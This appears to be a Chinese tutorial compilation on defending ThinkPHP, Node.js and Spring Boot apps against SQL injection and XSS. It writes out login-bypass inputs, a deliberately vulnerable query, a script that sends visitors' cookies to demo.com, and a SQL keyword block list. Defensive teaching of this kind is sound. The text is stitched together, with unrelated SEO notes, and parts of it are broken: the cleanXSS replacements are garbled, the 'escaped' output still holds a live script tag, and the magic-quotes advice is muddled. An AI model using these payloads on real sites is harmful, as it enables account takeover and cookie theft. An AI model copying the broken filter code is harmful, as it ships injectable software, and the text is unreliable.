input(‘param.money/f’,‘0’,'remove_xss’);
 
从前端接收数据时，加remove_xss

系统甚至对于数据安全方面本身进行了很多的处理和相应的防范机制
 对于用户输入了一些恶意的整形参数，比如id等，系统也会强制转换成整型，避免恶意注入。这是因为，系统数据进行强制的数据类型检测，并且对数据来源进行数据格式转换。而且，对于字符串类型的数据，ThinkPHP都会进行escape_string处理（real_escape_string，mysql_escape_string），还支持参数绑定。
 
通常的安全隐患在于你的查询条件使用了字符串参数，然后其中一些变量又依赖由客户端的用户输入。要有效的防止SQL注入问题，建议使用下列方式
 （1）查询条件尽量使用数组方式，这是更为安全的方式；
 （2）如果不得已必须使用字符串查询条件，使用预处理机制；
 （3）开启数据字段类型验证，可以对数值数据类型做强制转换；
 （4）使用自动验证和自动完成机制进行针对应用的自定义过滤；
 （5）使用字段类型检查、自动验证和自动完成机制等避免恶意数据的输入。

 
仿sql注入
 
SEO:
 
1，如果优化的话title部分是非常重要的，用来优化我们网站的关键字的
 
搜索引擎会根据关键字对你的网站归类，如果网站权重高的话，当用户搜索关键字的时候，会先看到你的网站
 
2，日与网站---指向英文的网站，说明日语的网站给英文的投了一票，如果给英语的网站投的票越多，说明英文的网站越好
 
防止SQL注入：
 
1，建一个用户登录的表单
 
select()会查询出所有的记录
 
find()只会查询一条记录
 
写一个简单的用户名验证，在用户名表单中写上’or 1 or’也会提示用户名正确，
 
思考题：为什么会不验证就成功了？
 
echo $model->getLastsql();//打印出sql语句
 
经过查询执行的sql语句，我们发现，导致sql注入的原因是单引号
 
因为：
 
1，通过php的魔术引号，来将用户输入的数据进行转义
 
php的低版本，默认是开启的，这样会自动的将用户输入的数据进行转义
 
php.ini中的
 
是开启的改为
 
Magic_quotes_gpc=On
 
就可以防止验证正确
 
2，对用户提交的数据进行转义
 
$username=addslashes($_POST['username']);用addslashes函数处理一下
 
3，利用thinkphp的系统变量获得外部数据$this->_server
 
thinkphp系统常量(4个)
 
$this->_post('username','addslashes');
 
4，使用数组作为tp框架中where条件
 
5、直接把查询语句写成
 
$list=$model->where('user_name="'.$username.'" and dept_id="'.$password.'"')->select();就不会登陆成功了
 
例：//仿sql注入
 
public function login(){
 
$this->display();
 
}
 
public function verify(){
 
//用户名'or 1 or'登录会提示登录成功,是不正确的
 
//方法1修改ini.php
 
$username=$_POST['username'];
 
$password=$_POST['password'];
 
//方法2
 
/*$username=addslashes($_POST['username']);
 
$password=$_POST['password'];
 
//方法3
 
$this->_post('username','addslashes');
 
$password=$_POST['password'];
 
//方法4数组
 
$cond['user_name']=$username;
 
$cond['dept_id']=$password;
 
$list=$model->where($cond)->find();*/
 
$model=M('User');
 
//方法5
 
// $list=$model->where('user_name="'.$username.'" and dept_id="'.$password.'"')->select();
 
$list=$model->where("user_name='$username' and dept_id='$password'")->select();
 
echo $model->getLastsql();//打印出sql语句
 
if($list){
 
echo '登录成功';
 
}else{
 
echo '登录失败';
 
}
 
}
 
tpl：
 
用户名:
 
密码：
 
以上讲述的就是thinkphp防止sql注入攻击了，方法不止一种，大家可以尝试的去写一下，练练手。
 
相关推荐：

 

 
SQL注入简介
 
SQL 注入漏洞(SQL Injection)是 Web 开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息，或者利用数据库的特性执行添加用户，导出文件等一系列恶意操作，甚至有可能获取数据库乃至系统用户最高权限。
 
而造成 SQL 注入的原因是因为程序没有有效的转义过滤用户的输入，使攻击者成功的向服务器提交恶意的 SQL 查询代码，程序在接收后错误的将攻击者的输入作为查询语句的一部分执行，导致原始的查询逻辑被改变，额外的执行了攻击者精心构造的恶意代码。
 
很多 Web 开发者没有意识到 SQL 查询是可以被篡改的，从而把 SQL 查询当作可信任的命令。殊不知，SQL 查询是可以绕开访问控制，从而绕过身份验证和权限检查的。更有甚者，有可能通过 SQL 查询去运行主机系统级的命令。
 
SQL 注入原理
 
下面将通过一些真实的例子来详细讲解 SQL 注入的方式的原理。
 
考虑以下简单的管理员登录表单：
 
Username: 
 
Password: 
 
后端的 SQL 语句可能是如下这样的：let querySQL = `
 
SELECT *
 
FROM user
 
WHERE username='${username}'
 
AND psw='${password}'
 
`;
 
// 接下来就是执行 sql 语句
 
目的就是来验证用户名和密码是不是正确，按理说乍一看上面的 SQL 语句也没什么毛病，确实是能够达到我们的目的，可是你只是站在用户会老老实实按照你的设计来输入的角度来看问题，如果有一个恶意攻击者输入的用户名是 zhangsan’ OR 1 = 1 --，密码随意输入，就可以直接登入系统了。
 
冷静下来思考一下，我们之前预想的真实 SQL 语句是：SELECT * FROM user WHERE username='zhangsan' AND psw='mypassword'
 
可以恶意攻击者的奇怪用户名将你的 SQL 语句变成了如下形式：SELECT * FROM user WHERE username='zhangsan' OR 1 = 1 --' AND psw='xxxx'
 
在 SQL 中，-- 是注释后面的内容的意思，所以查询语句就变成了：SELECT * FROM user WHERE username='zhangsan' OR 1 = 1
 
这条 SQL 语句的查询条件永远为真，所以意思就是恶意攻击者不用我的密码，就可以登录进我的账号，然后可以在里面为所欲为，然而这还只是最简单的注入，牛逼的 SQL 注入高手甚至可以通过 SQL 查询去运行主机系统级的命令，将你主机里的内容一览无余，这里我也没有这个能力讲解的太深入，毕竟不是专业研究这类攻击的，但是通过以上的例子，已经了解了 SQL 注入的原理，我们基本已经能找到防御 SQL 注入的方案了。
 
预防 SQL 注入
 
防止 SQL 注入主要是不能允许用户输入的内容影响正常的 SQL 语句的逻辑，当用户的输入的信息将要用来拼接 SQL 语句的话，我们应该永远选择不相信，任何内容都必须进行转义过滤，当然做到这个还是不够的，下面列出防御 SQL 注入的几点注意事项：
 
1、严格限制Web应用的数据库的操作权限，给此用户提供仅仅能够满足其工作的最低权限，从而最大限度的减少注入攻击对数据库的危害。
 
2、后端代码检查输入的数据是否符合预期，严格限制变量的类型，例如使用正则表达式进行一些匹配处理。
 
3、对进入数据库的特殊字符(’，"，\，，&，*，; 等)进行转义处理，或编码转换。基本上所有的后端语言都有对字符串进行转义处理的方法，比如 lodash 的 lodash._escapehtmlchar 库。
 
4、所有的查询语句建议使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到 SQL 语句中，即不要直接拼接 SQL 语句。例如 Node.js 中的 mysqljs 库的 query 方法中的 ? 占位参数。mysql.query(`SELECT * FROM user WHERE username = ? AND psw = ?`, [username, psw]);
 
5、在应用发布之前建议使用专业的 SQL 注入检测工具进行检测，以及时修补被发现的 SQL 注入漏洞。网上有很多这方面的开源工具，例如 sqlmap、SQLninja 等。
 
6、避免网站打印出 SQL 错误信息，比如类型错误、字段不匹配等，把代码里的 SQL 语句暴露出来，以防止攻击者利用这些错误信息进行 SQL 注入。
 
7、不要过于细化返回的错误信息，如果目的是方便调试，就去使用后端日志，不要在接口上过多的暴露出错信息，毕竟真正的用户不关心太多的技术细节，只要话术合理就行。
 
XSS 攻击简介
 
XSS 攻击，即跨站脚本攻击(Cross Site Scripting)，它是 web 程序中常见的漏洞。 原理是攻击者往 web 页面里插入恶意的脚本代码(CSS代码、JavaScript代码等)，当用户浏览该页面时，嵌入其中的脚本代码会被执行，从而达到恶意攻击用户的目的。如盗取用户cookie，破坏页面结构、重定向到其他网站等。
 
理论上来说，web 页面中所有可由用户输入的地方，如果没有对输入的数据进行过滤处理的话，都会存在 XSS 漏洞；当然，我们也需要对模板视图中的输出数据进行过滤。
 
XSS 攻击示例
 
有一个博客网站，提供了一个 web 页面(内含表单)给所有的用户发表博客，但该博客网站的开发人员并没有对用户提交的表单数据做任何过滤处理。 现在，我是一个攻击者，在该博客网站发表了一篇博客，用于盗取其他用户的cookie信息。博客内容如下：This is a XSS test!
 
var cookie = document.cookie;
 
window.open("http://demo.com/getCookie.php?param="+cookie);
 
这是一段 XSS 攻击代码。当其他用户查看我的这篇博客时，他们的 cookie 信息就会被发送至我的 web 站点(http://demo.com/) ，如此，我就盗取了其他用户的 cookie 信息。
 
预防 XSS 攻击
 
核心思想
 
永远不要相信用户的输入，必须对输入的数据作过滤处理。
 
该函数会把字符串中的特殊字符转化为 HTML 实体，这样在输出时，恶意的代码就无法执行了。这些特殊字符主要是 ’ " & < >。
 
比如，我刚刚的恶意代码被过滤后，会变为下面的代码：<b>This is a XSS test!</b>
 
<script>
 
var cookie = document.cookie;
 
window.open("http://demo.com/getCookie.php?param="+cookie);
 
</script>
 
这样，就可以预防大部分 XSS 攻击了。
 
服务端代码处理
 
以springboot为例：
 
可利用过滤器进行设置，如下所示：/**
 
* 防止sql注入,xss攻击
 
* 前端可以对输入信息做预处理，后端也可以做处理。
 
*/
 
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {
 
private final Logger log = LoggerFactory.getLogger(getClass());
 
private static String key = "and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char
 
|declare|;|or|-|+";
 
private static Set notAllowedKeyWords = new HashSet(0);
 
private static String replacedString="INVALID";
 
static {
 
String keyStr[] = key.split("\\|");
 
for (String str : keyStr) {
 
notAllowedKeyWords.add(str);
 
}
 
}
 
private String currentUrl;
 
public XssHttpServletRequestWrapper(HttpServletRequest servletRequest) {
 
super(servletRequest);
 
currentUrl = servletRequest.getRequestURI();
 
}
 
/**覆盖getParameter方法，将参数名和参数值都做xss过滤。
 
* 如果需要获得原始的值，则通过super.getParameterValues(name)来获取
 
* getParameterNames,getParameterValues和getParameterMap也可能需要覆盖
 
*/
 
@Override
 
public String getParameter(String parameter) {
 
String value = super.getParameter(parameter);
 
if (value == null) {
 
return null;
 
}
 
return cleanXSS(value);
 
}
 
@Override
 
public String[] getParameterValues(String parameter) {
 
String[] values = super.getParameterValues(parameter);
 
if (values == null) {
 
return null;
 
}
 
int count = values.length;
 
String[] encodedValues = new String[count];
 
for (int i = 0; i < count; i++) {
 
encodedValues[i] = cleanXSS(values[i]);
 
}
 
return encodedValues;
 
}
 
@Override
 
public Map getParameterMap(){
 
Map values=super.getParameterMap();
 
if (values == null) {
 
return null;
 
}
 
Map result=new HashMap<>();
 
for(String key:values.keySet()){
 
String encodedKey=cleanXSS(key);
 
int count=values.get(key).length;
 
String[] encodedValues = new String[count];
 
for (int i = 0; i < count; i++){
 
encodedValues[i]=cleanXSS(values.get(key)[i]);
 
}
 
result.put(encodedKey,encodedValues);
 
}
 
return result;
 
}
 
/**
 
* 覆盖getHeader方法，将参数名和参数值都做xss过滤。
 
* 如果需要获得原始的值，则通过super.getHeaders(name)来获取
 
* getHeaderNames 也可能需要覆盖
 
*/
 
@Override
 
public String getHeader(String name) {
 
String value = super.getHeader(name);
 
if (value == null) {
 
return null;
 
}
 
return cleanXSS(value);
 
}
 
private String cleanXSS(String valueP) {
 
// You'll need to remove the spaces from the html entities below
 
String value = valueP.replaceAll("", ">");
 
value = value.replaceAll("", "& gt;");
 
value = value.replaceAll("\\(", "& #40;").replaceAll("\\)", "& #41;");
 
value = value.replaceAll("'", "& #39;");
 
value = value.replaceAll("eval\\((.*)\\)", "");
 
value = value.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");
 
value = value.replaceAll("script", "");
 
value = cleanSqlKeyWords(value);
 
return value;
 
}
 
private String cleanSqlKeyWords(String value) {
 
String paramValue = value;
 
for (String keyword : notAllowedKeyWords) {
 
if (paramValue.length() > keyword.length() + 4
 
&& (paramValue.contains(" "+keyword)||paramValue.contains(keyword+" ")||paramValue.
 
contains(" "+keyword+" "))) {
 
paramValue = StringUtils.replace(paramValue, keyword, replacedString);
 
log.error(this.currentUrl + "已被过滤，因为参数中包含不允许sql的关键词(" + keyword
 
+ ")"+";参数："+value+";过滤后的参数："+paramValue);
 
}
 
}
 
return paramValue;
 
}
 
}